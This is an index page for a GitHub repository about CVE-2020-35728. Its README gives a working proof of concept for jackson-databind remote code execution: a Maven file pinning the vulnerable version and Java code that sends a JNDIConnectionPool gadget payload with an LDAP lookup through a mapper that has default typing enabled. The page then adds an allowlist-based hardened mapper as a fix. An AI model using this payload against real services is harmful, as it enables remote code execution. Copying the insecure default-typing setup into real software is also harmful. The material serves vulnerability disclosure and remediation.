Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Al1ex/CVE-2020-35728
CVE-2020-35728 & Jackson-databind RCE
cve-2020-35728 jackson-databind rce
Last synced: 3 months ago
- Host: GitHub
- URL: https://github.com/Al1ex/CVE-2020-35728
- Owner: Al1ex
- Created: 2020-12-31T01:55:39.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2020-12-31T01:56:18.000Z (almost 4 years ago)
- Last Synced: 2024-05-02T18:51:15.427Z (6 months ago)
- Topics: cve-2020-35728, jackson-databind, rce
- Homepage:
- Size: 916 KB
- Stars: 42
- Watchers: 2
- Forks: 7
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Al1ex/CVE-2020-35728 - CVE-2020-35728 & Jackson-databind RCE (Others)
README
### Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

### How to RCE
pom.xml
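```xml
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.jacksonTest</groupId>
  <artifactId>jacksonTest</artifactId>
  <version>1.0-SNAPSHOT</version>
  <dependencies>
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.9.10.7</version>
    </dependency>
    <dependency>
      <groupId>org.glassfish.web</groupId>
      <artifactId>jakarta.servlet.jsp.jstl</artifactId>
      <version>2.0.0</version>
    </dependency>
    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-nop</artifactId>
      <version>1.7.2</version>
    </dependency>
    <dependency>
      <groupId>javax.transaction</groupId>
      <artifactId>jta</artifactId>
      <version>1.1</version>
    </dependency>
  </dependencies>
</project>
```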
poc.java
~~~
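import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
    public static void main(String[] args) throws Exception {
        // Polymorphic payload in [type id, properties] form; the type id names the gadget class.
        String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1088/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        // Default typing lets the JSON itself choose which class gets instantiated.
        mapper.enableDefaultTyping();
        Object obj = mapper.readValue(payload, Object.class);
        // Serialization walks the object's getters; this is the "serialization gadget"
        // interaction the description refers to.
        mapper.writeValueAsString(obj);
    }
}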
~~~
result

![result](image/result.jpg)
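
The PoC works only because `enableDefaultTyping()` accepts whatever class name the JSON supplies. As an added example (not code from this repository), here is the same kind of mapper built with an allowlist validator. It assumes jackson-databind 2.10 or later, and `HardenedMapper` and `Order` are hypothetical names.

```java
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.io.IOException;

public class HardenedMapper {
    // Hypothetical application DTO: the only type allowed as a polymorphic subtype.
    public static class Order {
        public int id;
    }

    static ObjectMapper build() {
        // Allowlist rather than blocklist: any type id not matched here is refused.
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Order.class)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Replaces the deprecated enableDefaultTyping(); needs jackson-databind 2.10+.
        mapper.activateDefaultTyping(ptv);
        return mapper;
    }

    // Returns true if the mapper accepted the type id embedded in the JSON.
    static boolean accepts(ObjectMapper mapper, String json) throws IOException {
        try {
            mapper.readValue(json, Object.class);
            return true;
        } catch (JsonMappingException e) {
            // A refused or unresolvable type id surfaces as InvalidTypeIdException,
            // which is a JsonMappingException.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = build();
        // Constructed inputs: an allowed DTO, and the README's class name with an empty body.
        String allowed = "[\"" + Order.class.getName() + "\",{\"id\":7}]";
        String gadget = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{}]";
        System.out.println("allowed DTO accepted: " + accepts(mapper, allowed));
        System.out.println("gadget type accepted: " + accepts(mapper, gadget));
    }
}
```

The gadget type id is rejected whether or not the JSTL artifact is on the classpath, because the decision is made from the allowlist and not from a list of known-bad classes.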